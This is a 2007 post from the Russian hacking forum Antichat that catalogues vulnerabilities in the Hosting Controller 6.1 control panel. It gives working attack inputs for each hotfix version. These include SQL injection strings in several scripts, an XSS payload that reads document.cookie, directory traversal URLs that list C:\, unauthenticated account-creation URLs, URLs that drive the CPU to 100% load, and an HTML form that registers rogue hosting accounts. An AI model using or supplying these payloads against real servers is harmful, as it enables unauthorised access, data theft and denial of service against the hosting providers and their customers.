ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в CMS Hosting Controller
  #1  
Старый 17.12.2007, 17:09
Аватар для Solide Snake
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
Post Уязвимости в CMS Hosting Controller

Привет Представляю вашему вниманию небольшой озбор уязвимостей в CMS Hosting Controller.

Уязвимости в Hosting Controller


Site: http://www.hostingcontroller.com

Exploits/Shellcode

Hosting Controller <= 0.6.1 Hotfix 1.4 Directory Browsing Vulnerability
Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit
Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)
Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)
Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit
Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit
Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability
Hosting Controller <= 6.1 Hotfix 3.2 Remote Unauthenticated Vulns
Hosting Controller 6.1 Hot fix <= 3.3 Multiple Remote Vulnerabilities


Hosting Controller 6.1 Hotfix <= 3.2 SQL Injection

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "ForumID" в сценариях DisableForum.asp и EnableForum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:
http://[host]/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
http://[host]/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
2. Уязвимость существует из-за ошибки проверки прав пользователя при доступе к определенным сценариям. Удаленный пользователь может создать и удалить виртуальные директории произвольных сайтов с помощью сценариев DisableForum.asp и EnableForum.asp.
Пример:

Код:
http://[host]/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
http://[host]/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=

Hosting Controller v.6.1 & prior XSS

Уязвимость существует из-за недостаточной обработки входных данных в параметре "error" в сценарии error.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:
http://target:/admin/hosting/error.asp?error=<script>alert(document.cookie)</script>

Обход ограничений безопасности в Hosting Controller 6.1 HotFix 2.2

Уязвимость позволяет удаленному авторизованному пользователю добавить имена пользователей на системе.
Удаленный авторизованный пользователь может послать специально сформированный HTTP запрос сценарию 'AccountActions.asp' и добавить имена пользователей на системе.

Exploit

1. Удаленный авторизованный пользователь может вызвать сценарий 'planmanagerstep1.asp' и добавить планы к своей учетной записи.

2. Удаленный авторизованный пользователь может отредактировать и просмотреть планы, доступные на сервере.
Примеры:

Код:
http://[target]/admin/hosting/plandetails.asp?hostcustid=[EVERY PLAN NUMBER!]
http://[target]/admin/hosting/plandetails.asp?hostcustid=1 or 1=1 

http://[target]/admin/hosting/editplanopt1.asp?planid=[EVERY PLAN NUMBER!]
http://[target]/admin/hosting/editplanopt2.asp?planid=[EVERY PLAN NUMBER!]
3. Уязвимость обнаружена в сценарии 'IISActions.asp'. Удаленный авторизованный пользователь может создать домен или под-домен без квот.


Hosting Controller 6.1 HotFix 2.1 SQL Injection

Уязвимость позволяет удаленному авторизованному пользователю выполнить произвольные SQL команды в базе данных приложения и вызвать отказ в обслуживании системы.

1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии 'listreason.asp'. Удаленный авторизованный пользователь может выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:
http://[target]/admin/accounts/listreason.asp?ListReaso n=tester'%20or%20'1'='1
2. Удаленный авторизованный пользователь может с помощью специально сформированного URL вызвать 100% загрузку процессора.
Пример:

Код:
http://[target]/admin/hosting/editplanopt3.asp
http://[target]/admin/AdminSettings/plansettings.asp?action=1
http://[target]/admin/ hosting/planmanager.asp?action=3&planid=2
http://[target]/admin/hosting/planmanager.asp
http://[target]/admin/hosting/planmanager.asp?action=3&planid=1
3. Удаленный авторизованный пользователь может послать сценарию '/admin/hosting/addsubsite_online.asp' специально сформированный POST запрос и создать новую учетную запись в приложении.
Пример:

Код:
<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
< INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
< INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
< INPUT type="hidden" name="htype" value="27" id="htype5" >
< INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
< input type="submit" value="Make">
< /FORM>
4. Удаленный авторизованный пользователь может создать сессию со специальными привилегиями с помощью URL:

Код:
http://[target]/admin/hosting/dsp_newreseller.asp
5. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в полях формы поиска в сценариях 'IISManagerDB.asp' и 'AccountManager.asp'. Удаленный авторизованный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:
'or'1'='1'or'1'='1

Hosting Controller 6.1 HotFix 2.0 SQL Injection

1. Уязвимость существует при обработке входных данных в параметре 'resourceid' сценария 'resellerresources.asp'. Удаленный авторизованный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:
http://[target]/admin/hosting/resellerresources.asp?
action=2&jresourceid=1%20or%201=1
2. Удаленный авторизованный пользователь может с помощью специально сформированного URL просмотреть данные других пользователей.
Пример:

Код:
http://[target]/admin/hosting/plandetails.asp?hostcustid=[PlanID]

Обход авторизации в Hosting Controller 6.1 Hotfix 1.9

Уязвимость существует в сценарии 'admin/hosting/addsubsite.asp'. Удаленный пользователь может послать специально сформированные данные и создать нового пользователя и новую учетную запись хоста.
Пример:

Код:
http://[target]/admin/hosting/addsubsite.asp?
loginname=Mouse&password =123456 

http://[target]:8077/hosting/addsubsite.asp?
loginname=Mouse&password=123456

Обход каталога в Hosting Controller v.6.1 Hotfix 1.4

Обнаружена уязвимость в Hosting Controller. Удаленный авторизованный пользователь может просмотреть произвольные файлы на системе.

Уязвимость существует в файлах 'Statsbrowse.asp' и 'Generalbrowser.asp' из-за некорректной фильтрации входных данных.
Пример:

Код:
http://[target]/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0 
http://[target]/admin/iis/Generalbrowse.asp?FilePath=C:\
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Faq по проектированию Cms k00p3r Обсуждение Ваших сайтов 0 09.08.2005 09:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ